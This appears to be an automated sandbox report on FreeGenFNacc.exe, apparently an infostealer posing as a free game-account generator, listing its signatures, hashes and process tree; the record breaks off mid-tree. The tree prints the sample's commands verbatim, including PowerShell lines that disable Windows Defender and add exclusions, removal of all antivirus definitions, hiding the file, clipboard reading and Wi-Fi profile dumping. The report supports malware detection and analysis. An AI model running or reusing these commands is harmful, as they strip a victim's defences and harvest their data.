Analysis
-
max time kernel
66s -
max time network
66s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
09-01-2025 15:58
Behavioral task
behavioral1
Sample
FreeGenFNacc.exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral2
Sample
FreeGenFNacc.exe
Resource
win11-20241007-en
General
-
Target
FreeGenFNacc.exe
-
Size
13.9MB
-
MD5
1c1bd68b07c75975bacef9d407fd9031
-
SHA1
ce44c004c571ec8e2ae8f0e5bf8429cc4a15f3b8
-
SHA256
0bae3b4f3aff820ffc728fe8649039b577bb9aa0f6a8afb5da54c4739b258518
-
SHA512
4b6a368fce8aa9d02107470c646f74d0b41b7214d56de2a12b931314c81ea22a6be577da82660b7864eff54f78fc6bdcbe430d2477599ff06f22b0b0f22b5508
-
SSDEEP
393216:9Q+IdCylyglJfn/IxU6/y2cCMQbDhZdhe:mqylB/nwF/APaQ
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 4288 MpCmdRun.exe -
pid Process 2840 powershell.exe 4880 powershell.exe 3252 powershell.exe 3848 powershell.exe 2540 powershell.exe 2408 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts FreeGenFNacc.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2052 cmd.exe 2332 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 684 bound.exe 3088 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe 1556 FreeGenFNacc.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com 23 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 3492 tasklist.exe 2948 tasklist.exe 3880 tasklist.exe 3376 tasklist.exe 3920 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 1744 cmd.exe -
resource yara_rule behavioral1/files/0x002800000004618d-22.dat upx behavioral1/memory/1556-26-0x00007FF9BBA10000-0x00007FF9BBFF9000-memory.dmp upx behavioral1/files/0x002800000004617f-28.dat upx behavioral1/memory/1556-31-0x00007FF9CAC00000-0x00007FF9CAC24000-memory.dmp upx behavioral1/files/0x0028000000046186-49.dat upx behavioral1/memory/1556-50-0x00007FF9D45D0000-0x00007FF9D45DF000-memory.dmp upx behavioral1/files/0x0028000000046185-48.dat upx behavioral1/files/0x0028000000046184-47.dat upx behavioral1/files/0x0028000000046183-46.dat upx behavioral1/files/0x0028000000046182-45.dat upx behavioral1/files/0x0028000000046181-44.dat upx behavioral1/files/0x0028000000046180-43.dat upx behavioral1/files/0x002800000004617e-42.dat upx behavioral1/files/0x0028000000046192-41.dat upx behavioral1/files/0x0028000000046191-40.dat upx behavioral1/files/0x0028000000046190-39.dat upx behavioral1/files/0x002800000004618c-36.dat upx behavioral1/files/0x002800000004618a-35.dat upx behavioral1/files/0x002800000004618b-32.dat upx behavioral1/memory/1556-56-0x00007FF9CA9C0000-0x00007FF9CA9ED000-memory.dmp upx behavioral1/memory/1556-58-0x00007FF9CB140000-0x00007FF9CB159000-memory.dmp upx behavioral1/memory/1556-60-0x00007FF9C9B40000-0x00007FF9C9B63000-memory.dmp upx behavioral1/memory/1556-62-0x00007FF9BB8A0000-0x00007FF9BBA10000-memory.dmp upx behavioral1/memory/1556-64-0x00007FF9CAB80000-0x00007FF9CAB99000-memory.dmp upx behavioral1/memory/1556-66-0x00007FF9CA9B0000-0x00007FF9CA9BD000-memory.dmp upx behavioral1/memory/1556-68-0x00007FF9CA920000-0x00007FF9CA94E000-memory.dmp upx behavioral1/memory/1556-75-0x00007FF9BB2B0000-0x00007FF9BB625000-memory.dmp upx behavioral1/memory/1556-73-0x00007FF9BB630000-0x00007FF9BB6E8000-memory.dmp upx behavioral1/memory/1556-72-0x00007FF9BBA10000-0x00007FF9BBFF9000-memory.dmp upx behavioral1/memory/1556-76-0x00007FF9CAC00000-0x00007FF9CAC24000-memory.dmp upx behavioral1/memory/1556-81-0x00007FF9CA9A0000-0x00007FF9CA9AD000-memory.dmp upx behavioral1/memory/1556-80-0x00007FF9CA9C0000-0x00007FF9CA9ED000-memory.dmp upx behavioral1/memory/1556-78-0x00007FF9CA900000-0x00007FF9CA914000-memory.dmp upx behavioral1/memory/1556-84-0x00007FF9BAF70000-0x00007FF9BB08C000-memory.dmp upx behavioral1/memory/1556-85-0x00007FF9C9B40000-0x00007FF9C9B63000-memory.dmp upx behavioral1/memory/1556-88-0x00007FF9BB8A0000-0x00007FF9BBA10000-memory.dmp upx behavioral1/memory/1556-120-0x00007FF9CAB80000-0x00007FF9CAB99000-memory.dmp upx behavioral1/memory/1556-140-0x00007FF9CA920000-0x00007FF9CA94E000-memory.dmp upx behavioral1/memory/1556-203-0x00007FF9BB630000-0x00007FF9BB6E8000-memory.dmp upx behavioral1/memory/1556-260-0x00007FF9BB2B0000-0x00007FF9BB625000-memory.dmp upx behavioral1/memory/1556-292-0x00007FF9CAC00000-0x00007FF9CAC24000-memory.dmp upx behavioral1/memory/1556-300-0x00007FF9CA920000-0x00007FF9CA94E000-memory.dmp upx behavioral1/memory/1556-297-0x00007FF9BB8A0000-0x00007FF9BBA10000-memory.dmp upx behavioral1/memory/1556-291-0x00007FF9BBA10000-0x00007FF9BBFF9000-memory.dmp upx behavioral1/memory/1556-331-0x00007FF9BBA10000-0x00007FF9BBFF9000-memory.dmp upx behavioral1/memory/1556-346-0x00007FF9BBA10000-0x00007FF9BBFF9000-memory.dmp upx behavioral1/memory/1556-360-0x00007FF9BAF70000-0x00007FF9BB08C000-memory.dmp upx behavioral1/memory/1556-371-0x00007FF9BB630000-0x00007FF9BB6E8000-memory.dmp upx behavioral1/memory/1556-370-0x00007FF9CA920000-0x00007FF9CA94E000-memory.dmp upx behavioral1/memory/1556-369-0x00007FF9CA9B0000-0x00007FF9CA9BD000-memory.dmp upx behavioral1/memory/1556-368-0x00007FF9CAB80000-0x00007FF9CAB99000-memory.dmp upx behavioral1/memory/1556-367-0x00007FF9BB8A0000-0x00007FF9BBA10000-memory.dmp upx behavioral1/memory/1556-366-0x00007FF9C9B40000-0x00007FF9C9B63000-memory.dmp upx behavioral1/memory/1556-365-0x00007FF9CB140000-0x00007FF9CB159000-memory.dmp upx behavioral1/memory/1556-364-0x00007FF9CA9C0000-0x00007FF9CA9ED000-memory.dmp upx behavioral1/memory/1556-363-0x00007FF9D45D0000-0x00007FF9D45DF000-memory.dmp upx behavioral1/memory/1556-362-0x00007FF9CAC00000-0x00007FF9CAC24000-memory.dmp upx behavioral1/memory/1556-361-0x00007FF9BB2B0000-0x00007FF9BB625000-memory.dmp upx behavioral1/memory/1556-359-0x00007FF9CA9A0000-0x00007FF9CA9AD000-memory.dmp upx behavioral1/memory/1556-358-0x00007FF9CA900000-0x00007FF9CA914000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4040 cmd.exe 1888 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2472 cmd.exe 2788 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3312 WMIC.exe 1016 WMIC.exe 3044 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1500 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1888 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3848 powershell.exe 3848 powershell.exe 1728 WMIC.exe 1728 WMIC.exe 1728 WMIC.exe 1728 WMIC.exe 4880 powershell.exe 4880 powershell.exe 4880 powershell.exe 2540 powershell.exe 2540 powershell.exe 2540 powershell.exe 3312 WMIC.exe 3312 WMIC.exe 3312 WMIC.exe 3312 WMIC.exe 1016 WMIC.exe 1016 WMIC.exe 1016 WMIC.exe 1016 WMIC.exe 2408 powershell.exe 2408 powershell.exe 1052 WMIC.exe 1052 WMIC.exe 1052 WMIC.exe 1052 WMIC.exe 2036 powershell.exe 2036 powershell.exe 2332 powershell.exe 2332 powershell.exe 2036 powershell.exe 2332 powershell.exe 3252 powershell.exe 3252 powershell.exe 1884 powershell.exe 1884 powershell.exe 2700 WMIC.exe 2700 WMIC.exe 2700 WMIC.exe 2700 WMIC.exe 472 WMIC.exe 472 WMIC.exe 472 WMIC.exe 472 WMIC.exe 648 WMIC.exe 648 WMIC.exe 648 WMIC.exe 648 WMIC.exe 2840 powershell.exe 2840 powershell.exe 3044 WMIC.exe 3044 WMIC.exe 3044 WMIC.exe 3044 WMIC.exe 2532 powershell.exe 2532 powershell.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3848 powershell.exe Token: SeIncreaseQuotaPrivilege 1728 WMIC.exe Token: SeSecurityPrivilege 1728 WMIC.exe Token: SeTakeOwnershipPrivilege 1728 WMIC.exe Token: SeLoadDriverPrivilege 1728 WMIC.exe Token: SeSystemProfilePrivilege 1728 WMIC.exe Token: SeSystemtimePrivilege 1728 WMIC.exe Token: SeProfSingleProcessPrivilege 1728 WMIC.exe Token: SeIncBasePriorityPrivilege 1728 WMIC.exe Token: SeCreatePagefilePrivilege 1728 WMIC.exe Token: SeBackupPrivilege 1728 WMIC.exe Token: SeRestorePrivilege 1728 WMIC.exe Token: SeShutdownPrivilege 1728 WMIC.exe Token: SeDebugPrivilege 1728 WMIC.exe Token: SeSystemEnvironmentPrivilege 1728 WMIC.exe Token: SeRemoteShutdownPrivilege 1728 WMIC.exe Token: SeUndockPrivilege 1728 WMIC.exe Token: SeManageVolumePrivilege 1728 WMIC.exe Token: 33 1728 WMIC.exe Token: 34 1728 WMIC.exe Token: 35 1728 WMIC.exe Token: 36 1728 WMIC.exe Token: SeDebugPrivilege 4880 powershell.exe Token: SeDebugPrivilege 2948 tasklist.exe Token: SeDebugPrivilege 2540 powershell.exe Token: SeIncreaseQuotaPrivilege 1728 WMIC.exe Token: SeSecurityPrivilege 1728 WMIC.exe Token: SeTakeOwnershipPrivilege 1728 WMIC.exe Token: SeLoadDriverPrivilege 1728 WMIC.exe Token: SeSystemProfilePrivilege 1728 WMIC.exe Token: SeSystemtimePrivilege 1728 WMIC.exe Token: SeProfSingleProcessPrivilege 1728 WMIC.exe Token: SeIncBasePriorityPrivilege 1728 WMIC.exe Token: SeCreatePagefilePrivilege 1728 WMIC.exe Token: SeBackupPrivilege 1728 WMIC.exe Token: SeRestorePrivilege 1728 WMIC.exe Token: SeShutdownPrivilege 1728 WMIC.exe Token: SeDebugPrivilege 1728 WMIC.exe Token: SeSystemEnvironmentPrivilege 1728 WMIC.exe Token: SeRemoteShutdownPrivilege 1728 WMIC.exe Token: SeUndockPrivilege 1728 WMIC.exe Token: SeManageVolumePrivilege 1728 WMIC.exe Token: 33 1728 WMIC.exe Token: 34 1728 WMIC.exe Token: 35 1728 WMIC.exe Token: 36 1728 WMIC.exe Token: SeIncreaseQuotaPrivilege 3848 powershell.exe Token: SeSecurityPrivilege 3848 powershell.exe Token: SeTakeOwnershipPrivilege 3848 powershell.exe Token: SeLoadDriverPrivilege 3848 powershell.exe Token: SeSystemProfilePrivilege 3848 powershell.exe Token: SeSystemtimePrivilege 3848 powershell.exe Token: SeProfSingleProcessPrivilege 3848 powershell.exe Token: SeIncBasePriorityPrivilege 3848 powershell.exe Token: SeCreatePagefilePrivilege 3848 powershell.exe Token: SeBackupPrivilege 3848 powershell.exe Token: SeRestorePrivilege 3848 powershell.exe Token: SeShutdownPrivilege 3848 powershell.exe Token: SeDebugPrivilege 3848 powershell.exe Token: SeSystemEnvironmentPrivilege 3848 powershell.exe Token: SeRemoteShutdownPrivilege 3848 powershell.exe Token: SeUndockPrivilege 3848 powershell.exe Token: SeManageVolumePrivilege 3848 powershell.exe Token: 33 3848 powershell.exe -
Suspicious use of FindShellTrayWindow 54 IoCs
pid Process 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe -
Suspicious use of SendNotifyMessage 54 IoCs
pid Process 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe 2700 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2468 wrote to memory of 1556 2468 FreeGenFNacc.exe 84 PID 2468 wrote to memory of 1556 2468 FreeGenFNacc.exe 84 PID 1556 wrote to memory of 4608 1556 FreeGenFNacc.exe 86 PID 1556 wrote to memory of 4608 1556 FreeGenFNacc.exe 86 PID 1556 wrote to memory of 4156 1556 FreeGenFNacc.exe 87 PID 1556 wrote to memory of 4156 1556 FreeGenFNacc.exe 87 PID 4608 wrote to memory of 3848 4608 cmd.exe 90 PID 4608 wrote to memory of 3848 4608 cmd.exe 90 PID 1556 wrote to memory of 1180 1556 FreeGenFNacc.exe 91 PID 1556 wrote to memory of 1180 1556 FreeGenFNacc.exe 91 PID 1556 wrote to memory of 472 1556 FreeGenFNacc.exe 92 PID 1556 wrote to memory of 472 1556 FreeGenFNacc.exe 92 PID 1556 wrote to memory of 2944 1556 FreeGenFNacc.exe 93 PID 1556 wrote to memory of 2944 1556 FreeGenFNacc.exe 93 PID 1556 wrote to memory of 3000 1556 FreeGenFNacc.exe 97 PID 1556 wrote to memory of 3000 1556 FreeGenFNacc.exe 97 PID 4156 wrote to memory of 4880 4156 cmd.exe 99 PID 4156 wrote to memory of 4880 4156 cmd.exe 99 PID 2944 wrote to memory of 2948 2944 cmd.exe 100 PID 2944 wrote to memory of 2948 2944 cmd.exe 100 PID 3000 wrote to memory of 1728 3000 cmd.exe 101 PID 3000 wrote to memory of 1728 3000 cmd.exe 101 PID 1180 wrote to memory of 2540 1180 cmd.exe 102 PID 1180 wrote to memory of 2540 1180 cmd.exe 102 PID 472 wrote to memory of 684 472 cmd.exe 103 PID 472 wrote to memory of 684 472 cmd.exe 103 PID 1556 wrote to memory of 2552 1556 FreeGenFNacc.exe 106 PID 1556 wrote to memory of 2552 1556 FreeGenFNacc.exe 106 PID 2552 wrote to memory of 5112 2552 cmd.exe 108 PID 2552 wrote to memory of 5112 2552 cmd.exe 108 PID 1556 wrote to memory of 1256 1556 FreeGenFNacc.exe 109 PID 1556 wrote to memory of 1256 1556 FreeGenFNacc.exe 109 PID 4156 wrote to memory of 4288 4156 cmd.exe 111 PID 4156 wrote to memory of 4288 4156 cmd.exe 111 PID 1256 wrote to memory of 5024 1256 cmd.exe 173 PID 1256 wrote to memory of 5024 1256 cmd.exe 173 PID 1556 wrote to memory of 2864 1556 FreeGenFNacc.exe 113 PID 1556 wrote to memory of 2864 1556 FreeGenFNacc.exe 113 PID 2864 wrote to memory of 3312 2864 cmd.exe 115 PID 2864 wrote to memory of 3312 2864 cmd.exe 115 PID 1556 wrote to memory of 3908 1556 FreeGenFNacc.exe 116 PID 1556 wrote to memory of 3908 1556 FreeGenFNacc.exe 116 PID 3908 wrote to memory of 1016 3908 cmd.exe 118 PID 3908 wrote to memory of 1016 3908 cmd.exe 118 PID 1556 wrote to memory of 1744 1556 FreeGenFNacc.exe 121 PID 1556 wrote to memory of 1744 1556 FreeGenFNacc.exe 121 PID 1556 wrote to memory of 3304 1556 FreeGenFNacc.exe 123 PID 1556 wrote to memory of 3304 1556 FreeGenFNacc.exe 123 PID 3304 wrote to memory of 2408 3304 cmd.exe 125 PID 3304 wrote to memory of 2408 3304 cmd.exe 125 PID 1744 wrote to memory of 5116 1744 cmd.exe 126 PID 1744 wrote to memory of 5116 1744 cmd.exe 126 PID 1556 wrote to memory of 3800 1556 FreeGenFNacc.exe 127 PID 1556 wrote to memory of 3800 1556 FreeGenFNacc.exe 127 PID 1556 wrote to memory of 2204 1556 FreeGenFNacc.exe 128 PID 1556 wrote to memory of 2204 1556 FreeGenFNacc.exe 128 PID 2204 wrote to memory of 3376 2204 cmd.exe 131 PID 2204 wrote to memory of 3376 2204 cmd.exe 131 PID 3800 wrote to memory of 3880 3800 cmd.exe 132 PID 3800 wrote to memory of 3880 3800 cmd.exe 132 PID 1556 wrote to memory of 1248 1556 FreeGenFNacc.exe 180 PID 1556 wrote to memory of 1248 1556 FreeGenFNacc.exe 180 PID 1556 wrote to memory of 2052 1556 FreeGenFNacc.exe 134 PID 1556 wrote to memory of 2052 1556 FreeGenFNacc.exe 134 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 5116 attrib.exe 5040 attrib.exe 4876 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe"C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe"C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4880
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:4288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:472 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
PID:684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:5112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:5024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:3312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:1016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\FreeGenFNacc.exe"4⤵
- Views/modifies file attributes
PID:5116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:1248
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:2332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4864
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1708
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
